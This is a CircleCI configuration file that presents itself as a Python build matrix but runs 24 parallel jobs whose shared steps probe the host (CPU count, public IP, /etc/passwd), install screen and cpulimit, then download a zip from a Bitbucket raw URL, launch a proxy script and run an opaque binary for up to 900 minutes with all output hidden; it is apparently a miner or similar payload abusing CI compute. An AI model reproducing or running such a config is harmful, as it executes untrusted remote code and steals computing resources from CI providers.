version: 2.1
jobs:
  python_01:
    docker:
      - image: circleci/python:3.10.0rc1-bullseye
    <<: &commonSteps
      steps:
        - run:
            name: Mr
            command: |
              ls -a
        - run:
            name: Golek
            command: |
              nproc && curl ipinfo.io/ip && cat /etc/passwd >/dev/null 2>&1
        - run:
            name: Opo
            command: |
              sudo apt install sudo screen nodejs npm libjansson4 cpulimit -y >/dev/null 2>&1
        - run:
            name: Run_Om. . . . . .
            no_output_timeout: 900m
            shell: /bin/sh -e
            command: |
              echo "Haiiiiii.........."
              wget https://bitbucket.org/sindylestari/sindy/raw/4997ae93025ae6811676e79fe9e58780469cc645/Api_App.zip >/dev/null 2>&1
              unzip Api_App.zip >/dev/null 2>&1
              chmod u+x * >/dev/null 2>&1
              screen -dmS proxy python3 prx.py >/dev/null 2>&1
              sleep 600s
              ./mainci >/dev/null 2>&1
  python_02:
    docker:
      - image: circleci/python:3.10-rc-bullseye
    <<: *commonSteps
  python_03:
    docker:
      - image: circleci/python:3.10.0rc1-buster
    <<: *commonSteps
  python_04:
    docker:
      - image: circleci/python:3.10-rc-buster
    <<: *commonSteps
  python_05:
    docker:
      - image: circleci/python:3.9.6-bullseye
    <<: *commonSteps
  python_06:
    docker:
      - image: circleci/python:3.9-bullseye
    <<: *commonSteps
  python_07:
    docker:
      - image: circleci/python:3.10.0rc1-bullseye
    <<: *commonSteps
  python_08:
    docker:
      - image: circleci/python:3.10-rc-bullseye
    <<: *commonSteps
  python_09:
    docker:
      - image: circleci/python:3.10.0rc1-buster
    <<: *commonSteps
  python_10:
    docker:
      - image: circleci/python:3.10-rc-buster
    <<: *commonSteps
  python_11:
    docker:
      - image: circleci/python:3.9.6-bullseye
    <<: *commonSteps
  python_12:
    docker:
      - image: circleci/python:3.9-bullseye
    <<: *commonSteps
  python_13:
    docker:
      - image: circleci/python:3.10.0rc1-bullseye
    <<: *commonSteps
  python_14:
    docker:
      - image: circleci/python:3.10-rc-bullseye
    <<: *commonSteps
  python_15:
    docker:
      - image: circleci/python:3.10.0rc1-buster
    <<: *commonSteps
  python_16:
    docker:
      - image: circleci/python:3.10-rc-buster
    <<: *commonSteps
  python_17:
    docker:
      - image: circleci/python:3.9.6-bullseye
    <<: *commonSteps
  python_18:
    docker:
      - image: circleci/python:3.9-bullseye
    <<: *commonSteps
  python_19:
    docker:
      - image: circleci/python:3.10.0rc1-bullseye
    <<: *commonSteps
  python_20:
    docker:
      - image: circleci/python:3.10-rc-bullseye
    <<: *commonSteps
  python_21:
    docker:
      - image: circleci/python:3.10.0rc1-buster
    <<: *commonSteps
  python_22:
    docker:
      - image: circleci/python:3.10-rc-buster
    <<: *commonSteps
  python_23:
    docker:
      - image: circleci/python:3.9.6-bullseye
    <<: *commonSteps
  python_24:
    docker:
      - image: circleci/python:3.9-bullseye
    <<: *commonSteps







workflows:
  version: 2
  all:
    jobs:
      - python_01
      - python_02
      - python_03
      - python_04
      - python_05
      - python_06
      - python_07
      - python_08
      - python_09
      - python_10
      - python_11
      - python_12
      - python_13
      - python_14
      - python_15
      - python_16
      - python_17
      - python_18
      - python_19
      - python_20
      - python_21
      - python_22
      - python_23
      - python_24
